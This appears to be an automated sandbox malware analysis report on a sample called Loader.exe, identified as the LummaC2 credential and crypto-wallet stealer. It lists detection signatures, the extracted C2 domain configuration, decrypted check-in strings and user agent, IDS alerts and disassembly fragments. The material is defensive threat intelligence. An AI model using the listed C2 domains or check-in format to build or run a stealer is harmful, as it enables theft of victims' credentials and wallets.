Edit tour

Windows Analysis Report
Loader.exe

Overview

General Information

Sample name:	Loader.exe
Analysis ID:	1582869
MD5:	287009edb0ce8e161d3a6328864fcf30
SHA1:	888dffb2851bae70ceeaf18d0ab2abd6361d3976
SHA256:	7c13fd5a81f9aeca85799bc1cff61329599d032569287d8b2db7b43d3a51df30
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to modify clipboard data

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64native

Loader.exe (PID: 6576 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 287009EDB0CE8E161D3A6328864FCF30)

conhost.exe (PID: 4488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

Loader.exe (PID: 1980 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 287009EDB0CE8E161D3A6328864FCF30)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["tirepublicerj.shop", "framekgirus.shop", "noisycuttej.shop", "rabidcowse.shop", "cloudewahsj.shop", "wholersorie.shop", "stingyerasjhru.click", "nearycrepso.shop", "abruptyopsn.shop"], "Build id": "pqZnKP--Z2xsZXhl"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000003.00000003.91105435551.000000000340D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.91105517341.00000000033B1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.91780179524.00000000033B4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.96103081032.00000000033B5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.91118614146.00000000033B1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.91105992992.00000000033B1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.91778616538.00000000033B1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Loader.exe PID: 1980	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Loader.exe PID: 1980	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Loader.exe PID: 1980	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Loader.exe PID: 1980	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 8 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:42:27.808066+0100	2028371	3	Unknown Traffic	192.168.11.20	49755	172.67.157.249	443	TCP
2024-12-31T17:42:28.757362+0100	2028371	3	Unknown Traffic	192.168.11.20	49756	172.67.157.249	443	TCP
2024-12-31T17:42:30.125095+0100	2028371	3	Unknown Traffic	192.168.11.20	49757	172.67.157.249	443	TCP
2024-12-31T17:42:31.498061+0100	2028371	3	Unknown Traffic	192.168.11.20	49758	172.67.157.249	443	TCP
2024-12-31T17:42:32.922949+0100	2028371	3	Unknown Traffic	192.168.11.20	49759	172.67.157.249	443	TCP
2024-12-31T17:42:34.575563+0100	2028371	3	Unknown Traffic	192.168.11.20	49760	172.67.157.249	443	TCP
2024-12-31T17:42:36.328647+0100	2028371	3	Unknown Traffic	192.168.11.20	49761	172.67.157.249	443	TCP
2024-12-31T17:42:40.735775+0100	2028371	3	Unknown Traffic	192.168.11.20	49762	172.67.157.249	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:42:28.480934+0100	2054653	1	A Network Trojan was detected	192.168.11.20	49755	172.67.157.249	443	TCP
2024-12-31T17:42:29.480257+0100	2054653	1	A Network Trojan was detected	192.168.11.20	49756	172.67.157.249	443	TCP
2024-12-31T17:42:41.414171+0100	2054653	1	A Network Trojan was detected	192.168.11.20	49762	172.67.157.249	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:42:28.480934+0100	2049836	1	A Network Trojan was detected	192.168.11.20	49755	172.67.157.249	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:42:29.480257+0100	2049812	1	A Network Trojan was detected	192.168.11.20	49756	172.67.157.249	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:42:27.808066+0100	2058627	1	Domain Observed Used for C2 Detected	192.168.11.20	49755	172.67.157.249	443	TCP
2024-12-31T17:42:28.757362+0100	2058627	1	Domain Observed Used for C2 Detected	192.168.11.20	49756	172.67.157.249	443	TCP
2024-12-31T17:42:30.125095+0100	2058627	1	Domain Observed Used for C2 Detected	192.168.11.20	49757	172.67.157.249	443	TCP
2024-12-31T17:42:31.498061+0100	2058627	1	Domain Observed Used for C2 Detected	192.168.11.20	49758	172.67.157.249	443	TCP
2024-12-31T17:42:32.922949+0100	2058627	1	Domain Observed Used for C2 Detected	192.168.11.20	49759	172.67.157.249	443	TCP
2024-12-31T17:42:34.575563+0100	2058627	1	Domain Observed Used for C2 Detected	192.168.11.20	49760	172.67.157.249	443	TCP
2024-12-31T17:42:36.328647+0100	2058627	1	Domain Observed Used for C2 Detected	192.168.11.20	49761	172.67.157.249	443	TCP
2024-12-31T17:42:40.735775+0100	2058627	1	Domain Observed Used for C2 Detected	192.168.11.20	49762	172.67.157.249	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stingyerasjhru .click)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:42:27.392052+0100	2058626	1	Domain Observed Used for C2 Detected	192.168.11.20	52464	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:42:32.356036+0100	2048094	1	Malware Command and Control Activity Detected	192.168.11.20	49758	172.67.157.249	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://stingyerasjhru.click/apibca	Avira URL Cloud: Label: malware
Source: https://stingyerasjhru.click/api=	Avira URL Cloud: Label: malware
Source: https://stingyerasjhru.click/sqg	Avira URL Cloud: Label: malware
Source: https://stingyerasjhru.click/api	Avira URL Cloud: Label: malware
Source: https://stingyerasjhru.click/apiqS	Avira URL Cloud: Label: malware
Source: https://stingyerasjhru.click/apitreak	Avira URL Cloud: Label: malware
Source: https://stingyerasjhru.click/apintOS	Avira URL Cloud: Label: malware
Source: https://stingyerasjhru.click/Vg	Avira URL Cloud: Label: malware
Source: https://stingyerasjhru.click/apiC	Avira URL Cloud: Label: malware
Source: stingyerasjhru.click	Avira URL Cloud: Label: malware
Source: https://stingyerasjhru.click/xg	Avira URL Cloud: Label: malware
Source: https://stingyerasjhru.click/	Avira URL Cloud: Label: malware
Source: https://stingyerasjhru.click/Rd	Avira URL Cloud: Label: malware
Source: https://stingyerasjhru.click/F	Avira URL Cloud: Label: malware
Source: https://stingyerasjhru.click/C	Avira URL Cloud: Label: malware
Source: rabidcowse.shop	Avira URL Cloud: Label: malware
Source: https://stingyerasjhru.click/T	Avira URL Cloud: Label: malware
Source: https://stingyerasjhru.click/aRd	Avira URL Cloud: Label: malware
Source: https://stingyerasjhru.click/m$g	Avira URL Cloud: Label: malware
Source: wholersorie.shop	Avira URL Cloud: Label: malware
Source: https://stingyerasjhru.click/Og	Avira URL Cloud: Label: malware
Source: https://stingyerasjhru.click/e	Avira URL Cloud: Label: malware
Source: cloudewahsj.shop	Avira URL Cloud: Label: malware
Source: https://stingyerasjhru.click/apir	Avira URL Cloud: Label: malware
Source: noisycuttej.shop	Avira URL Cloud: Label: malware
Source: https://stingyerasjhru.click/apie	Avira URL Cloud: Label: malware
Source: nearycrepso.shop	Avira URL Cloud: Label: malware
Source: https://stingyerasjhru.click/bxg	Avira URL Cloud: Label: malware
Source: https://stingyerasjhru.click/apiV	Avira URL Cloud: Label: malware
Source: https://stingyerasjhru.click/s	Avira URL Cloud: Label: malware
Source: tirepublicerj.shop	Avira URL Cloud: Label: malware
Source: https://stingyerasjhru.click/apior	Avira URL Cloud: Label: malware
Source: https://stingyerasjhru.click/apiP	Avira URL Cloud: Label: malware
Source: framekgirus.shop	Avira URL Cloud: Label: malware
Source: abruptyopsn.shop	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.91037565997.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["tirepublicerj.shop", "framekgirus.shop", "noisycuttej.shop", "rabidcowse.shop", "cloudewahsj.shop", "wholersorie.shop", "stingyerasjhru.click", "nearycrepso.shop", "abruptyopsn.shop"], "Build id": "pqZnKP--Z2xsZXhl"}

Multi AV Scanner detection for submitted file

Source: Loader.exe

ReversingLabs: Detection: 29%

Machine Learning detection for sample

Source: Loader.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: cloudewahsj.shop
Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: rabidcowse.shop
Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: noisycuttej.shop
Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: tirepublicerj.shop
Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: framekgirus.shop
Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: wholersorie.shop
Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: abruptyopsn.shop
Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: nearycrepso.shop
Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: stingyerasjhru.click
Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: pqZnKP--Z2xsZXhl

Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0041929D CryptUnprotectData,	3_2_0041929D
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00418B32 CryptUnprotectData,	3_2_00418B32
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00415BB7 CryptUnprotectData,	3_2_00415BB7

Source: Loader.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49762 version: TLS 1.2

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00CDB6E8 FindFirstFileExW,	0_2_00CDB6E8
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00CDB799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00CDB799
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00CDB6E8 FindFirstFileExW,	3_2_00CDB6E8
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00CDB799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_00CDB799

Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov word ptr [edi], ax	3_2_0043C943
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+46CE1FD7h]	3_2_00421A9F
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 06702B10h	3_2_00421A9F
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [eax+edx]	3_2_0040BB49
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-18564150h]	3_2_00418B32
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp word ptr [edi+eax], 0000h	3_2_00420450
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+000000B0h]	3_2_0040E460
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [eax], bl	3_2_0040CDF5
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0042B660
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0042AE1D
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edi, edx	3_2_00408680
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 088030A7h	3_2_004196A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+341B10A6h]	3_2_004196A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 11A82DE9h	3_2_004196A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 11A82DE9h	3_2_004196A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 6E87DD67h	3_2_004196A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 6E87DD67h	3_2_004196A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 11A82DE9h	3_2_004196A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	3_2_004196A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], EABBD981h	3_2_0040D864
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	3_2_00434070
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movsx ebx, byte ptr [eax+edx]	3_2_0043E010
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp ecx	3_2_0043E010
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0042C017
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movsx ebx, byte ptr [eax+edx]	3_2_0043E0D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp ecx	3_2_0043E0D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [edx], cl	3_2_0042B94C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movsx ebx, byte ptr [eax+edx]	3_2_0043E160
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp ecx	3_2_0043E160
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	3_2_004159D8
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+00h]	3_2_004029E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ebx, eax	3_2_00405980
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ebp, eax	3_2_00405980
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov al, 01h	3_2_0043D189
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ecx, eax	3_2_0042820E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+edi+1AAFB8ABh]	3_2_0042821B
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0042C2C5
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ecx, eax	3_2_0042B2D3
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0042B2D3
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	3_2_00429B50
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0042CB27
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx eax, word ptr [ebp+00h]	3_2_00438BF8
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	3_2_00429380
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ebx, edx	3_2_00417B87
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 9EB5184Bh	3_2_00417B87
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edx, ecx	3_2_00417B87
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], C50B4B65h	3_2_00417B87
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	3_2_00417B87
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	3_2_00417B87
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E0A81160h	3_2_00417B87
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	3_2_00417B87
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp dword ptr [00445864h]	3_2_00417B87
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	3_2_00417B87
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	3_2_00417B87
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ecx, eax	3_2_0042A454
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp ecx	3_2_0043E4C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	3_2_004074E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	3_2_004074E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-353DC4A8h]	3_2_00423488
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp eax	3_2_00423488
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	3_2_00423488
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	3_2_00423488
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	3_2_00423488
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebp+esi*8+00h], 7F7BECC6h	3_2_0043B490
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ecx, eax	3_2_0042A4AB
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-5D841D24h]	3_2_00424D50
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movsx ebx, byte ptr [eax+edx]	3_2_0043DD50
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp ecx	3_2_0043DD50
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_0041FD70
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then push esi	3_2_00420573
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 4B1BF3DAh	3_2_00414D12
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 37A3DD63h	3_2_00414D12
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-5D841D24h]	3_2_00424DD0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edi, dword ptr [ebp-18h]	3_2_004275D8
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ecx, eax	3_2_0042B5BA
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0042B5BA
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0042B66B
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov dword ptr [esi+04h], edi	3_2_0042BE79
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0042BE79
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movsx ebx, byte ptr [eax+edx]	3_2_0043DEC0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp ecx	3_2_0043DEC0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp byte ptr [esi+eax], 00000000h	3_2_00429690
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-1Fh]	3_2_00409770
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edi, byte ptr [ecx]	3_2_0043F700
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx+5F7FB8E0h]	3_2_00415F2D
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-5D841D18h]	3_2_0042878C

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058626 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stingyerasjhru .click) : 192.168.11.20:52464 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058627 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI) : 192.168.11.20:49762 -> 172.67.157.249:443
Source: Network traffic	Suricata IDS: 2058627 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI) : 192.168.11.20:49761 -> 172.67.157.249:443
Source: Network traffic	Suricata IDS: 2058627 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI) : 192.168.11.20:49760 -> 172.67.157.249:443
Source: Network traffic	Suricata IDS: 2058627 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI) : 192.168.11.20:49755 -> 172.67.157.249:443
Source: Network traffic	Suricata IDS: 2058627 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI) : 192.168.11.20:49757 -> 172.67.157.249:443
Source: Network traffic	Suricata IDS: 2058627 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI) : 192.168.11.20:49759 -> 172.67.157.249:443
Source: Network traffic	Suricata IDS: 2058627 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI) : 192.168.11.20:49756 -> 172.67.157.249:443
Source: Network traffic	Suricata IDS: 2058627 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI) : 192.168.11.20:49758 -> 172.67.157.249:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.11.20:49756 -> 172.67.157.249:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.11.20:49755 -> 172.67.157.249:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49756 -> 172.67.157.249:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49755 -> 172.67.157.249:443
